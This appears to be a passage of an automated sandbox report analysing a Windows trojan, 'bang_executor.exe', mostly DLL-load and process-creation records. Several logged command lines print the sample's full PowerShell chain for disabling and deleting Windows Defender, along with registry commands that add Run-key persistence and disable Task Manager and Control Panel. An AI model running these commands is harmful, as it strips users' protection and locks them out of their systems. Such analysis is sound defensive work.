          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeSection loaded: kernel.appcore.dll
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeSection loaded: version.dll
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeSection loaded: vcruntime140_clr0400.dll
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeSection loaded: ucrtbase_clr0400.dll
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeSection loaded: cryptsp.dll
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeSection loaded: rsaenh.dll
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeSection loaded: cryptbase.dll
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeSection loaded: windows.storage.dll
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeSection loaded: wldp.dll
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeSection loaded: profapi.dll
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeSection loaded: websocket.dll
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeSection loaded: rasapi32.dll
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeSection loaded: rasman.dll
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeSection loaded: rtutils.dll
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeSection loaded: mswsock.dll
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeSection loaded: winhttp.dll
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeSection loaded: ondemandconnroutehelper.dll
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeSection loaded: iphlpapi.dll
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeSection loaded: dhcpcsvc6.dll
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeSection loaded: dhcpcsvc.dll
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeSection loaded: dnsapi.dll
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeSection loaded: winnsi.dll
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeSection loaded: rasadhlp.dll
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeSection loaded: fwpuclnt.dll
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeSection loaded: secur32.dll
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeSection loaded: sspicli.dll
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeSection loaded: schannel.dll
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeSection loaded: mskeyprotect.dll
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeSection loaded: ntasn1.dll
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeSection loaded: ncrypt.dll
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeSection loaded: ncryptsslp.dll
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeSection loaded: msasn1.dll
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeSection loaded: gpapi.dll
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeSection loaded: mscoree.dll
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeSection loaded: kernel.appcore.dll
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeSection loaded: version.dll
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeSection loaded: vcruntime140_clr0400.dll
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeSection loaded: ucrtbase_clr0400.dll
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeSection loaded: ucrtbase_clr0400.dll
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeSection loaded: cryptsp.dll
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeSection loaded: rsaenh.dll
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeSection loaded: cryptbase.dll
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeSection loaded: windows.storage.dll
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeSection loaded: wldp.dll
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeSection loaded: profapi.dll
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeSection loaded: websocket.dll
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeSection loaded: rasapi32.dll
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeSection loaded: rasman.dll
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeSection loaded: rtutils.dll
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeSection loaded: mswsock.dll
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeSection loaded: winhttp.dll
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeSection loaded: ondemandconnroutehelper.dll
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeSection loaded: iphlpapi.dll
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeSection loaded: dhcpcsvc6.dll
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeSection loaded: dhcpcsvc.dll
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeSection loaded: dnsapi.dll
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeSection loaded: winnsi.dll
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeSection loaded: rasadhlp.dll
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeSection loaded: fwpuclnt.dll
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeSection loaded: secur32.dll
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeSection loaded: sspicli.dll
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeSection loaded: schannel.dll
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeSection loaded: mskeyprotect.dll
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeSection loaded: ntasn1.dll
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeSection loaded: ncrypt.dll
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeSection loaded: ncryptsslp.dll
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeSection loaded: msasn1.dll
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeSection loaded: gpapi.dll
          Source: bang_executor.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoControlPanel /t REG_DWORD /d 1 /f
          Source: executer.exe.0.dr, Program.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
          Source: executer.exe.0.dr, Program.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
          Source: bang_executor.exe.0.dr, Program.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
          Source: bang_executor.exe.0.dr, Program.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
          Source: classification engineClassification label: mal100.troj.evad.winEXE@45/30@1/1
          Source: C:\Users\user\Desktop\bang_executor.exeCode function: 0_2_004E7BFF GetLastError,FormatMessageW,0_2_004E7BFF
          Source: C:\Users\user\Desktop\bang_executor.exeCode function: 0_2_004FC652 FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree,0_2_004FC652
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\executer.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\executer.exe.logJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeMutant created: NULL
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7316:120:WilError_03
          Source: C:\Windows\System32\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7572
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7000:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6512:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7192:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7644:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7516:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7604:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7228:120:WilError_03
          Source: C:\Windows\System32\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7356
          Source: C:\Windows\System32\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7968
          Source: C:\Windows\System32\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess1236
          Source: C:\Users\user\Desktop\bang_executor.exeFile created: C:\Users\user\AppData\Local\Temp\RarSFX0Jump to behavior
          Source: C:\Users\user\Desktop\bang_executor.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\RarSFX0\bang.bat" "
          Source: C:\Users\user\Desktop\bang_executor.exeCommand line argument: sfxname0_2_0050037C
          Source: C:\Users\user\Desktop\bang_executor.exeCommand line argument: sfxstime0_2_0050037C
          Source: C:\Users\user\Desktop\bang_executor.exeCommand line argument: pPR0_2_0050037C
          Source: C:\Users\user\Desktop\bang_executor.exeCommand line argument: STARTDLG0_2_0050037C
          Source: C:\Users\user\Desktop\bang_executor.exeCommand line argument: >GQ0_2_00514690
          Source: bang_executor.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\bang_executor.exeFile read: C:\Windows\win.iniJump to behavior
          Source: C:\Users\user\Desktop\bang_executor.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: C:\Users\user\Desktop\bang_executor.exeFile read: C:\Users\user\Desktop\bang_executor.exeJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\bang_executor.exe C:\Users\user\Desktop\bang_executor.exe
          Source: C:\Users\user\Desktop\bang_executor.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\RarSFX0\bang.bat" "
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exe bang_executor.exe
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\RarSFX0\executer.exe executer.exe
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /K instaling.bat
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\executer.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /K mgr.bat
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /K microsoft.bat
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoControlPanel /t REG_DWORD /d 1 /f
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v bang_executor /t REG_SZ /d "C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exe" /f
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\executer.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /C echo Add-MpPreference -ExclusionPath "C:\" -ErrorAction SilentlyContinue; Add-MpPreference -ExclusionProcess "C:\*" -ErrorAction SilentlyContinue; Set-MpPreference -DisableArchiveScanning 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableBehaviorMonitoring 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableIntrusionPreventionSystem 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableIOAVProtection 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableRemovableDriveScanning 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableBlockAtFirstSeen 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableScanningMappedNetworkDrivesForFullScan 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableScanningNetworkFiles 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableScriptScanning 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableRealtimeMonitoring 1 -ErrorAction SilentlyContinue; Set-MpPreference -LowThreatDefaultAction Allow -ErrorAction SilentlyContinue; Set-MpPreference -ModerateThreatDefaultAction Allow -ErrorAction SilentlyContinue; Set-MpPreference -HighThreatDefaultAction Allow -ErrorAction SilentlyContinue; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WdNisSvc" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WinDefend" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\Sense" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WdnisDrv" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\wdfilter" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\wdboot" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection" -Name SpyNetReporting -Value 0; Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection" -Name SubmitSamplesConsent -Value 0; Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows Defender\Features" -Name TamperProtection -Value 4; Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows Defender" -Name DisableAntiSpyware -Value 1; Set-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Name DisableAntiSpyware -Value 1; Remove-Item -Recurse -Force -Path "C:\ProgramData\Windows\Windows Defender\"; Remove-Item -Recurse -Force -Path "C:\ProgramData\Windows\Windows Defender Advanced Threat Protection\"; Remove-Item -Recurse -Force -Path "C:\Windows\System32\drivers\wd\"; Remove-Item -Recurse -Force -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WdNisSvc"; Remove-Item -Recurse -Force -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WinDefend"; Remove-Item -Recurse -Force -Path "HKLM:\SYSTEM\CurrentControlSet\Services\Sense"; Remove-Item -Recurse -Force -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WdnisDrv"; Remove-Item -Recurse -Force -
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v NoDispAppearancePage /t REG_DWORD /d 1 /f
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\executer.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /C powershell.exe -ep bypass .\test.ps1;
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exe "C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exe"
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ep bypass .\test.ps1;
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 1236 -s 2324
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7572 -s 2328
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
          Source: C:\Windows\SysWOW64\reg.exeProcess created: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exe "C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exe"
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7356 -s 2296
          Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exe "C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exe"
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7968 -s 2324
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\bang_executor.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\RarSFX0\bang.bat" "Jump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exe bang_executor.exe Jump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\RarSFX0\executer.exe executer.exe Jump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /K instaling.batJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /K mgr.batJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /K microsoft.batJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\executer.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /C echo Add-MpPreference -ExclusionPath "C:\" -ErrorAction SilentlyContinue; Add-MpPreference -ExclusionProcess "C:\*" -ErrorAction SilentlyContinue; Set-MpPreference -DisableArchiveScanning 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableBehaviorMonitoring 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableIntrusionPreventionSystem 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableIOAVProtection 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableRemovableDriveScanning 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableBlockAtFirstSeen 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableScanningMappedNetworkDrivesForFullScan 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableScanningNetworkFiles 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableScriptScanning 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableRealtimeMonitoring 1 -ErrorAction SilentlyContinue; Set-MpPreference -LowThreatDefaultAction Allow -ErrorAction SilentlyContinue; Set-MpPreference -ModerateThreatDefaultAction Allow -ErrorAction SilentlyContinue; Set-MpPreference -HighThreatDefaultAction Allow -ErrorAction SilentlyContinue; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WdNisSvc" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WinDefend" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\Sense" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WdnisDrv" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\wdfilter" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\wdboot" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection" -Name SpyNetReporting -Value 0; Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection" -Name SubmitSamplesConsent -Value 0; Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows Defender\Features" -Name TamperProtection -Value 4; Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows Defender" -Name DisableAntiSpyware -Value 1; Set-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Name DisableAntiSpyware -Value 1; Remove-Item -Recurse -Force -Path "C:\ProgramData\Windows\Windows Defender\"; Remove-Item -Recurse -Force -Path "C:\ProgramData\Windows\Windows Defender Advanced Threat Protection\"; Remove-Item -Recurse -Force -Path "C:\Windows\System32\drivers\wd\"; Remove-Item -Recurse -Force -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WdNisSvc"; Remove-Item -Recurse -Force -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WinDefend"; Remove-Item -Recurse -Force -Path "HKLM:\SYSTEM\CurrentControlSet\Services\Sense"; Remove-Item -Recurse -Force -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WdnisDrv"; Remove-Item -Recurse -Force -Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\executer.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /C powershell.exe -ep bypass .\test.ps1;Jump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoControlPanel /t REG_DWORD /d 1 /fJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v NoDispAppearancePage /t REG_DWORD /d 1 /fJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /fJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v bang_executor /t REG_SZ /d "C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exe" /fJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exe "C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exe" Jump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ep bypass .\test.ps1;Jump to behavior
          Source: C:\Users\user\Desktop\bang_executor.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32Jump to behavior
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
          Source: bang_executor.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
          Source: bang_executor.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
          Source: bang_executor.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
          Source: bang_executor.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: bang_executor.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
          Source: bang_executor.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
          Source: bang_executor.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
          Source: bang_executor.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbg source: bang_executor.exe, 00000013.00000002.1766943002.0000023BA08E4000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: bang_executor.exe, 00000003.00000002.1778857723.0000023079B74000.00000004.00000020.00020000.00000000.sdmp, bang_executor.exe, 00000020.00000002.1823246822.0000021D7B567000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Windows\mscorlib.pdbC source: bang_executor.exe, 00000013.00000002.1766943002.0000023BA08E4000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: bang_executor.exe, 00000003.00000002.1778857723.0000023079B74000.00000004.00000020.00020000.00000000.sdmp, bang_executor.exe, 00000020.00000002.1823246822.0000021D7B567000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.PDB4% source: bang_executor.exe, 00000020.00000002.1823246822.0000021D7B5A9000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Windows\mscorlib.pdbR source: bang_executor.exe, 00000020.00000002.1823246822.0000021D7B567000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: mscorlib.pdbx source: WERB598.tmp.dmp.26.dr
          Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb^ source: bang_executor.exe, 00000013.00000002.1766943002.0000023BA08E4000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: b77a5c561934e089\mscorlib.pdb source: bang_executor.exe, 0000001C.00000002.1778245154.0000000A2B5F1000.00000004.00000010.00020000.00000000.sdmp, bang_executor.exe, 00000020.00000002.1821242372.000000E666FF1000.00000004.00000010.00020000.00000000.sdmp
          Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb" source: bang_executor.exe, 00000013.00000002.1766943002.0000023BA0947000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\AppData\Local\Temp\RarSFX0\bang_executor.PDB@ source: bang_executor.exe, 00000020.00000002.1821242372.000000E666FF1000.00000004.00000010.00020000.00000000.sdmp
          Source: Binary string: mscorlib.ni.pdbRSDS7^3l source: WERF485.tmp.dmp.34.dr, WERB598.tmp.dmp.26.dr, WERB52A.tmp.dmp.25.dr, WERD313.tmp.dmp.30.dr
